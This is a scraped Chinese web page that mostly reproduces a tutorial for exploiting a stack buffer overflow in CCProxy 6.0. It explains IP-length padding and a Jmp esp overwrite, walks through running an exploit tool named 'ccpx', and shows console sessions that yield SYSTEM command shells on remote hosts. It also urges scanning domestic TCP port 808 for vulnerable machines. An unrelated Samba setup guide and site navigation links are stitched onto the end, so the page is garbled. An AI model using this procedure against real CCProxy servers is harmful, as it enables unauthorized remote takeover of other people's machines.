經過仔細分析發現,由於溢出是按照「[日期] 內容」的格式拷貝到字元串當中導致的,其中「內容」部分的格式是這樣的:

客戶端IP地址<空格>unknown<空格>Web<空格>HTTP請求

其中unknown和Web都是固定長度的字元串,HTTP請求是我們所能控制的字元串。但是這里存在一個問題,就是客戶端IP地址是我們無法控制的字元串,它的長度是不固定的,這樣一來,不同長度的客戶端IP地址就會導致不同的溢出點,這樣也就可能無法成功的溢出了。怎樣解決這個問題呢?我們雖然無法控制客戶端IP地址的字元串長度,但是我們可以得到這個字元串的長度,並且在我們所能控制的HTTP請求當中補齊這個長度,讓我們發送的Jmp esp地址始終覆蓋在函數返回地址上面。

而客戶端IP地址可能根據不同網路結構而分為三種情況:

如果攻擊者和攻擊目標在同一個網段(即中間不經過網關),那麼客戶端IP地址就是攻擊者主機的IP地址。

如果攻擊者和攻擊目標不在同一個網段上(即中間經過網關),但是攻擊者的主機有真實的IP地址。那麼客戶端IP地址也是攻擊者主機的IP地址。

如果攻擊者和攻擊目標不在同一個網段上(即中間經過網關),而且攻擊者的主機沒有真實的IP地址。例如攻擊者在內網,而攻擊目標主機在外網,那麼客戶端IP地址就是攻擊者的網關的外部IP地址。

知道了這三種情況之後,我們就可以動手改進剛才的Exploit程序了。首先要取出本機的IP地址,可以通過調用Socket函數Gethostname ()先取得獲取本機名,然後通過調用Gethostbyname()來得到本機IP地址的十六進制數值,最後利用Inet_ntoa()把這個數值轉換為字元串。這樣就解決了前兩種情況的客戶端IP地址,那麼對於第三種本機和目標主機不在同一網段的情況又怎麼辦呢?用程序實現自動取網關外部IP地址好像稍微麻煩了點,我懶得寫這樣的程序了,乾脆由用戶自己來輸入算了,怎麼得到你的網關外部IP地址就不用我來教了吧,應該是不難的,有些網站的論壇甚至都會直接顯示出你的IP地址,那就是你網關的IP地址。
TIPS:利用網關實現溢出攻擊還是第一次看到具體的例子,它們的網路通訊是如何建立的?數據傳輸是怎麼進行的?有興趣的朋友可以考慮一下,嘗試利用這個過程做點事情,相信你會有更都的發現。

漏洞攻擊程序使用方法

我用前面提到的方法寫了一個Exploit程序,按照「ccpx <目標IP> [埠]」這樣的格式來使用,其中目標IP就是你要攻擊的安裝了CCProxy的機器的IP地址,埠是目標IP上的CCProxy的HTTP代理埠,這個埠默認是808,但是可能會更改。

然後程序會提示你「本主機IP是否與目標主機IP在同一個網段?」,因為前面提到原因,所以要採取兩種不同的溢出字元串,如果你的機器和目標主機在同一個網段上,那你就選擇Y,如果不在同一網段就選N。如果你選擇了Nn,程序還會詢問你「本主機有沒有真實外網IP地址?」,也就是說你的機器是在內網還是外網,有沒有真實IP地址,如果有就選Y,沒有則選N。如果這次你又選擇了N,那麼程序會要求你輸入本主機所屬網關的外部IP地址,這個地址需要你自己想辦法得到,要得到它也並不困難。輸入之後就會成功發送溢出串,並自動連接ShellCode所開出的 24876埠,如果成功的話,就會出現系統許可權的CMD.EXE命令行了。

如果你的機器和目標主機在同一個網段上面那就簡單了,直接在第一步選Y就可以攻擊成功。如果你的機器雖然和目標主機不在同一個網段上面,但是確有真實IP地址,那就在第二步選Y。

三種不同情況的具體攻擊過程如下:
1.你的機器和目標主機在同一個網段上:

D:\Soft\ccx\ccpx\Debug>ccpx 192.168.0.103

本主機IP是否與目標主機IP在同一個網段?[y/n]y

[+] connecting to 192.168.0.103:808

[+] send magic buffer...

[+] connecting to CMD shell port...

Microsoft Windows 2000 [Version 5.00.2195]

(C) 版權所有 1985-2000 Microsoft Corp.

C:\Documents and Settings\Administrator> exit

exit

[-] Connection closed.

2.你的機器雖然和目標主機不在同一個網段上面,但是有真實IP地址: D:\Soft\ccx\ccpx\Debug>ccpx 202.xxx.xxx.xxx

本主機IP是否與目標主機IP在同一個網段?[y/n]n

本主機有沒有真實外網IP地址? [y/n]y

[+] connecting to 202.xxx.xxx.xxx:808

[+] send magic buffer...

[+] connecting to CMD shell port...

Microsoft Windows 2000 [Version 5.00.2195]

(C) 版權所有 1985-2000 Microsoft Corp.

C:\Documents and Settings\Administrator>exit

exit

[-] Connection closed.
3.你的機器在內網,而攻擊目標主機在外網:

D:\Soft\ccx\ccpx\Debug>ccpx 210.xxx.xxx.xxx

本主機IP是否與目標主機IP在同一個網段?[y/n]n

本主機有沒有真實外網IP地址? [y/n]n 三層交換技術 交換機與路由器密碼恢復 交換機的選購 路由器設置專題 路由故障處理手冊 數字化校園網解決方案
請輸入本主機所屬網關的外部IP地址: 202.xx.xx.xx ←在這里輸入是你網關的外部IP地址

[+] connecting to 210.xxx.xxx.xxx:808

[+] send magic buffer...

[+] connecting to CMD shell port...

Microsoft Windows 2000 [Version 5.00.2195]

(C) 版權所有 1985-2000 Microsoft Corp.

C:\Documents and Settings\Administrator>exit

exit

[-] Connection closed.

我這個程序裡面的Jmp esp地址是中文版Windows 2000中的地址,在其他版本的操作系統中可能會有所不同,需要讀者自己修改。

TIPS:由於這個ShellCode裡面採用了直接開埠的方法,所以如果讀者朋友的攻擊目標上有防火牆的話,可能會導致攻擊不成功。這種情況你需要更改isno程序中的ShellCode,把它替換成反向連接的ShellCode再重新編譯一遍就行了。具體方法請關注最近幾期「新手學溢出」欄目。

前面提到的這種根據不同網路情況來填充不同個數的A,從而把Jmp esp地址推到函數返回地址的方法是不是最好的方法呢?我覺得可能還有更好的方法,也許利用Sprintf函數的一些內部特性就可以不用這樣而寫出通用的利用程序了,但是我沒時間去研究這個了,如果讀者有興趣的話可以自己研究一下,如果研究出來,這也算是一項很實用的通用Exploit技術。

後來研究發現CCProxy不僅僅HTTP代理存在溢出問題,Telnet代理等一些其他調用日誌函數的埠也存在同樣的問題,攻擊方法類似,這里就不再詳細分析了。另外,CCProxy 5.x以及以前的版本雖然也存在此漏洞,但是構造字元串的方法略有不同,因此這個Exploit程序無法成功的攻擊CCProxy 5.x以及以前的版本,只能攻擊CCProxy 6.0。讀者可以自己研究一下老版本的CCProxy,並寫出Exploit程序。

結束語

這個漏洞雖然不是Windows操作系統本身的漏洞,但是CCProxy在國內還算一個比較常用的軟體,因此還是有一些利用價值的。不信你可以用Super Scan之類的埠掃描器掃描國內網段的TCP 808埠,很多時候都能找到安裝了CCProxy的機器。

其實寫這篇文章的目的並不是教大家去利用這個漏洞黑機器,而是告訴大家一個軟體漏洞從發現到跟蹤調試到最後寫Exploit程序的過程是怎樣的,也許你也能用這種方法找到一些其它的漏洞。

G. ccproxy代理伺服器軟體怎麼用

第1步,執行「應用程序」/「系統設置」/「伺服器設置」/「Samba」菜單命令,將彈出「Samba伺服器配置」對話框。
第2步,在彈出的「Samba伺服器配置」對話框中執行「首選項」/「伺服器設置」命令,將彈出「伺服器設置」對話框。在該對話框的「基本」選項卡中設置工具組名稱,可與Windows操作系統工作組的名稱相同,也可在「描述」文本框中填寫計算機的描述語言,它將在網路中顯示。
第3步,切換到「安全性」選項卡,在該選項卡中設置驗證模式「共享」、加密口令為「否」、來賓賬戶「無來賓賬戶」,最後單擊「確定」按鈕完成伺服器配置。
第4步,單擊「Samba伺服器配置」對話框中工具欄上「添加」按鈕,將彈出「創建Samba共享」對話框,在「目錄」文本框中輸入需要共享的目錄路徑和目錄名,在「共享名」文本框中輸入網路中顯示的名稱,默認為共享目錄名,也可在描述文本框中輸入一些說明,在「基本許可權」中可以選擇用戶是否有許可權對共享目錄進行寫操作,若不需網路中的客戶對共享的資源進行修改,則選擇「只讀」選項。
第5步,切換到「訪問」選項卡,在該選項卡中選擇「允許所有用戶訪問」選項,最後單擊「確定」按鈕完成伺服器配置。
第6步,關閉「伺服器配置」對話框,執行「應用程序」/「系統設置」/「伺服器設置」/「服務」菜單命令,在該對話框的服務列表中選中「smb」,再單擊工具欄中的「重啟」按鈕。
第7步,通過以上的配置,Samba伺服器就配置完成了。在Windows操作系統中打開網上鄰居,在網上鄰居中即可看到Linux操作系統rho1的共享「cdrom」。

H. ccproxy使用許可權問題

沒見有這么功能。
CCPROXY 畢竟是小工具,不是想有什麼功能就有什麼功能的。

閱讀全文

與ccproxy數據加密相關的資料

熱點內容
思科常用配置命令 瀏覽:377
水容易被壓縮嗎 瀏覽:753
java項目試題 瀏覽:315
為什麼安卓拍照沒有蘋果成相快 瀏覽:516
安卓版的蘋果手機叫什麼 瀏覽:373
手機怎麼解壓文件夾壓縮包 瀏覽:459
起源任務咋解壓 瀏覽:976
加密式的監督檢查 瀏覽:549
光遇怎麼分辨安卓國服和渠道服 瀏覽:242
ico解壓教程 瀏覽:632
程序員偏右 瀏覽:17
超算上可以進行vasp編譯嘛 瀏覽:174
北京通app怎麼注冊登錄 瀏覽:820
iphone上的數據怎麼轉移到安卓 瀏覽:743
python求每個時段平均值 瀏覽:244
安卓手機右上出現Hg什麼意思 瀏覽:69
程序員神經 瀏覽:753
dns伺服器在電腦上有什麼用 瀏覽:915
杭州大媽喜歡程序員 瀏覽:687
python評論樹講解 瀏覽:680